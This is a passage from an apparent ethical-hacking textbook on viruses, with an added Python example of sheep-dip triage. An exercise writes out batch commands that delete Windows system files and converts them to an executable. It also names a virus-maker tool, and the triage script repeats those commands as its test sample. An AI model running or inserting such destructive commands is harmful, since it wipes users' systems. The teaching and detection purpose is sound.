How to Create a Virus
Creating a virus can be a very complicated process or something that takes only
a few button clicks (see Exercise 8.1). Advanced programmers may choose to code the
malware from scratch. The less savvy or experienced may have to pursue other options,
such as hiring someone to write the virus, purchasing code, or using an “underground”
virus-maker application.
CREATING A VIRUS
Exercise 8.1: Creating a Simple Virus
So: let’s write a simple virus. You need access to Notepad and bat2com, the latter of which
you can find on the Internet:
Before you get started, here’s a warning: Do not execute this virus. This exercise is meant
to be a proof of concept and for illustrative purposes only. Executing this code on your
system could result in damage to your system that may require extensive time and skill to fix
properly. With that said, follow these steps:
- Create a batch file called virus.bat using Windows Notepad.
- Enter the following lines of code:
@echo off
Del c:\windows\system32\*.*
Del c:\windows\*.*
- Save virus.bat.
- From the command prompt, use bat2com to convert virus.bat into virus.com.
Another way to create a virus is to use a utility such as JPS Virus Maker. It is a simple
utility in which you pick options from a GUI and then choose to create a new executable
file that can be used to infect a host. Figure 8.1 shows the interface for JPS Virus Maker.
Researching Viruses
There are many defensive techniques for fighting malware, many of which we will
discuss later in this chapter; but what about researching new malware? If you need to
investigate and analyze malware in addition to defending against it, you should know
about a mechanism known as a sheep-dip system. A sheep-dip system is a computer that is
specifically configured to analyze files. The system typically is stripped down and includes
only those services and applications needed to test software to ascertain whether or not
it is safe.
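A static check that a sheep-dip system could run on a submitted batch file before anything is executed, shown as an added example that is not from the original text. The function name triage, the matching patterns and the benign sample are assumptions made here; the first sample repeats the batch lines from Exercise 8.1.

```python
import hashlib
import re

# cmd.exe commands that delete files or directories; anchoring at line start
# keeps "rem del ..." and "echo del ..." lines from matching.
DELETE_CMD = re.compile(r"^\s*@?(del|erase|rd|rmdir)\b(.*)$", re.IGNORECASE)
# The Windows directory, written literally or through an environment variable.
SYSTEM_TARGET = re.compile(r"c:\\windows|%windir%|%systemroot%", re.IGNORECASE)

# Constructed samples: the first repeats the batch lines from Exercise 8.1,
# the second is a harmless cleanup script invented for contrast.
SAMPLE_EXERCISE = r"""@echo off
Del c:\windows\system32\*.*
Del c:\windows\*.*
"""
SAMPLE_BENIGN = r"""@echo off
rem del c:\windows\*.* would be destructive; this only cleans temp files
del %TEMP%\build\*.tmp
echo done
"""


def triage(script_text):
    """Hash a batch script and list deletes aimed at the Windows directory.

    The script is only read as text and is never executed.
    """
    digest = hashlib.sha256(script_text.encode("utf-8")).hexdigest()
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        match = DELETE_CMD.match(line)
        if match and SYSTEM_TARGET.search(match.group(2)):
            # A wildcard delete under the system directory is the worst case.
            severity = "high" if "*" in match.group(2) else "medium"
            findings.append((lineno, severity, line.strip()))
    return digest, findings


if __name__ == "__main__":
    for name, text in (("exercise", SAMPLE_EXERCISE), ("benign", SAMPLE_BENIGN)):
        digest, findings = triage(text)
        print(name, digest[:16], "FLAGGED" if findings else "no findings")
        for lineno, severity, line in findings:
            print(f"  line {lineno} [{severity}] {line}")
```

The hash gives the analyst a stable identifier for the sample, and the findings list shows which lines to review before deciding whether the file is ever run on the isolated system.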